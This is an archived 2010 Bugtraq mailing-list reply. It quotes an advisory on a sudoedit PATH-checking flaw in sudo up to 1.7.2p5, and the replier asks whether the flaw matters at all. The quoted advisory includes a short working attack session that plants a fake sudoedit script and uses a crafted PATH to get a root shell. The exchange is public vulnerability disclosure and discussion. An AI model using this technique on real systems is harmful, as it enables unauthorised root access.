Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
From: Ansgar Wiechers (bugtraqplanetcobalt.net)
Date: Tue Apr 20 2010 - 01:42:32 CDT
On 2010-04-19 Agazzini Maurizio wrote:
> 1. Abstract.
> While writing an article about the vulnerability outlined in
> CVE-2010-0426, we found a distinct security flaw, also related to the
> sudoedit pseudo-command. Specifically, the path component of sudoedit
> is not checked correctly. This can be easily exploited by a local user
> with permission to run sudoedit, in order to execute arbitrary
> commands as root.
> 2. Example Attack Session.
> inodepandora:~$ echo "/bin/sh" > sudoedit
> inodepandora:~$ /usr/bin/chmod +x sudoedit
> inodepandora:~$ id
> uid=1000(inode) gid=100(users) groups=100(users)
> inodepandora:~$ export PATH=.
> inodepandora:~$ /usr/bin/sudo sudoedit /etc/hosts
> sh-3.1# /usr/bin/id
> uid=0(root) gid=0(root)
> 3. Affected Platforms.
> All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of
> this vulnerability requires that the /etc/sudoers file be configured
> to allow the attacker to run sudoedit.
Perhaps I'm missing something, but how is this a security flaw? A user
who is allowed to run "sudoedit" can edit /etc/sudoers, and thus allow
himself to run any command anyway.
"All vulnerabilities deserve a public fear period prior to patches
--Jason Coombs on Bugtraq